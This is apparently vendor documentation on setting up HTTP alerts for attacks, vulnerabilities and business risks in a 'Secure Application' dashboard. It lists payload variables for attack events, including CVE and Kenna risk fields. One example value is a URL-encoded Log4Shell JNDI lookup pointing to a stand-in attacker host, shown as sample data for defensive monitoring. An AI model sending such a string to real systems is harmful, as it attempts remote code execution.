Create an HTTP Alert
The Alerts tab allows you to configure email and HTTP based alerts. You can set up actions to get alerted when Secure Application detects new attacks, vulnerabilities, or business risks.
- From the Secure Application dashboard, navigate to Alerts.
- From the HTTP tab, click + Add Action.
- Enter the Action Name.Do not use special characters in the Action Name.
- Select the Event Type: Vulnerability, Business Risk, or Attack.
- Click Next.
- Enter following Action Details:
- Method Type: POST
- Encoding: UTF-8
- (Optional) Applications: Select up to 100 applications that this action applies to from the pull-down list. You can filter the list by typing into it. By default, this action applies to all applications.
- Raw URL: Enter the Raw URL of your HTTP request.
- Click Next.
- For Authentication Type select:
- None, if the communication is not encrypted
- Basic, and enter your username and password
- Bearer Token, and enter your token
- Click Next.
- (Optional) Specify custom headers for the request.
- Click Next.
- Click Add Payload.
The payload must be valid JSON. You can copy Predefined Variables, and paste the variables in the Editor. For example, if you select Attack as the Event Type, then you can select variable related to attack events when you click Add Payload.
Attack variables:
Field Description Example value $attack.id
Unique identifier for the attack "SQL_INJECTION_001"
$attack.status
Current status of the attack "ACTIVE"
,"RESOLVED"
,"INVESTIGATING"
$attack.source
Source or origin of the attack "External"
,"Internal"
,"Unknown"
$attack.outcome
Result or outcome of the attack "BLOCKED"
,"ALLOWED"
,"PARTIALLY_BLOCKED"
$attack.types
Type(s) of attack detected "SQL Injection"
,"XSS"
,"CSRF"
$attack.eventTrigger
Event that triggered the attack detection "HTTP Request"
,"Database Query"
$attack.lastDetected
Timestamp when the attack was last detected "2023-10-15T14:30:00Z"
$attack.events
Detailed events associated with the attack. See the Attack Events table below for details. JSON array of attack events $attack.events
contains the following key fields:Field Description Example value $attack.events.eventType
Type of activity detected during the attack "SOCKET_RESOLVE"
$attack.events.attackType
Specific attack category detected "LOG4J"
$attack.events.timestamp
When the attack event occurred "2025-01-22T23:03:52Z"
$attack.events.applicationName
Application which was affected by the attack "ExpoitsTestApp"
$attack.events.tierName
Tier which was affected by the attack "ExpoitsTestTier"
$attack.events.blocked
Indicates if the attack was blocked "true"
,"false"
$attack.events.attackOutcome
Outcome of the event "EXPLOITED"
,"ATTEMPTED"
,"BLOCKED"
,"OBSERVED"
,"UNKNOWN"
$attack.events.stackTrace
Stack trace where the attack originated "java.lang.SecurityManager.checkConnect(...)"
$attack.events.clientAddress
IP address of the client initiating the request "127.11.11.1"
$attack.events.clientPort
Port used by the client "40758"
$attack.events.serverAddress
IP address of the server handling the request "127.12.12.1"
$attack.events.serverPort
Port used by the server "8088"
$attack.events.webTransactionUrl
Full URL involved in the exploit attempt "https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
$attack.events.maliciousIpOut
Outbound IP address contacted during the event "192.0.2.123"
$attack.events.maliciousIpSourceOut
Source of malicious IP match, if any "10.1.2.45"
$attack.events.detailJson
Structured technical metadata (e.g., class, socket, method) {"classname": "java.net.SocketPermission", ...}
If the attack event is caused by a vulnerability,
$attack.events
may contain the following additional fields:Table 1. Vulnerability-Related Attack Event Fields Field Description Example value $attack.events.vulnerableMethod
Method where the vulnerability was triggered "org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
$attack.events.matchedCveName
Name of the matched CVE "CVE-2021-44228"
$attack.events.cveId
Internal identifier for the matched CVE $attack.events.vulnerabilityInfo.cvePublishDate
CVE publish date "2021-12-10T10:10:01Z"
$attack.events.vulnerabilityInfo.cvssScore
CVSS risk score (0–10) 10
$attack.events.vulnerabilityInfo.cvssSeverity
Severity level according to CVSS "CRITICAL"
$attack.events.vulnerabilityInfo.library
Vulnerable library involved "org.apache.logging.log4j:log4j-core"
$attack.events.vulnerabilityInfo.title
Human-readable description of the vulnerability "Remote Code Execution (RCE)"
$attack.events.vulnerabilityInfo.kennaScore
Risk score from Kenna Security 100
$attack.events.vulnerabilityInfo.kennaActiveInternetBreach
Whether the vuln is known to be actively exploited true
,false
$attack.events.vulnerabilityInfo.kennaEasilyExploitable
Whether the vuln is easy to exploit true
,false
$attack.events.vulnerabilityInfo.kennaPredictedExploitable
Predictive model’s assessment of exploitability true
,false
$attack.events.vulnerabilityInfo.kennaPopularTarget
Whether this is a popular target across orgs true
,false
Tip:Select the predefined variable
$attack.events
to include details related to any vulnerability associated with the attack in the payload.Select the predefined variable
$attack.events
to include up to 256 lines of the stack trace in the payload. - Confirm and review the following information: cURL,General Information,Actions,Security,Custom Headers, and Payload.Sample payload for ServiceNow:
- Click Save.